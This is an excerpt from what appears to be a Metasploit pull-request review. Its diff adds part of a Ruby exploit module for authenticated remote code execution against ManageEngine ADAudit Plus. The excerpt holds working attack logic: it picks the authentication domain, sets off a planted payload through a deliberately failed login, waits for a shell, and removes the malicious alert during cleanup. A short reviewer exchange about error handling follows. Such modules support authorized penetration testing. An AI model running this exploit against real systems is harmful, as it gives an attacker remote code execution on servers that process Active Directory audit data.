modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,564 @@
+      if domain_aliases == ['ADAuditPlus Authentication']
+        fail_with(Failure::NoTarget, 'No active directory domains are configured on the target, so the module will not be able to trigger the payload.')
+      end
+
+      # set the domain alias to the first configured domain, unless the user provided an invalid domain
+      # in the latter case, the module won't be able to authenticate to the target so there's no point to proceed
+      if auth_domain == 'ADAuditPlus Authentication' || domain_aliases&.include?(auth_domain)
+        vprint_status(domain_alias_msg)
+        @domain_alias = domain_aliases.first
+        print_status("Using configured authentication domain alias #{@domain_alias}.")
+      else
+        # this means the user provided an authentication domain that isn't actually configured on the target, so authentication cannot succeed
+        print_status(domain_alias_msg)
+        fail_with(Failure::BadConfig, "The provided AUTH_DOMAIN #{auth_domain} does not match the configured authentication domain(s).")
+      end
+    end
+
+    print_status("Attempting to trigger the payload via an authentication attempt for domain #{@domain_alias} using incorrect credentials.")
+    login_results = adaudit_plus_login(@domain_alias, rand_text_alphanumeric(5..8), rand_text_alphanumeric(8..12), true)
+    login_msg = login_results['message']
+    case login_results['status']
+    when adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY
+      fail_with(Failure::Unknown, "#{login_msg} You can try to manually trigger the payload via a failed login attempt for the #{@domain_alias} domain.")
+    when adaudit_plus_status::NO_ACCESS
+      print_status("Received expected reply when trying to trigger the payload. Let's hope we get a shell...")
+    else
+      print_warning('Received unexpected reply when trying to trigger the payload. The module will continue but exploitation will likely fail.')
+    end
+
+    @pwned = 0 # used to keep track of successful exploitation and the number of shells we get in cleanup and on_new_session
+  end
+
+  def cleanup
+    return unless @alert_name # this should only run if we actually created an alert
+
+    if @pwned == 0
+      print_error('Failed to obtain a shell. You could try increasing the WfsDelay value')
+    end
+    cookie_jar.clear
+    login_results = adaudit_plus_login(auth_domain, username, password, true)
+    case login_results['status']
+    when adaudit_plus_status::SUCCESS, adaudit_plus_status::NO_MATCH
+      delete_alert(login_results['adapcsrf_cookie'])
+    when adaudit_plus_status::CONNECTION_FAILED
+      print_warning('Connection failed when trying to authenticate in order to perform cleanup. Manual cleanup required.')
+    when adaudit_plus_status::UNEXPECTED_REPLY
+      print_warning('Received unexpected reply when trying to authenticate in order to perform cleanup. Manual cleanup required.')
+    else
```

Comment:
You still have NO_ACCESS which is not being handled here as an error code?

Reply:
added this now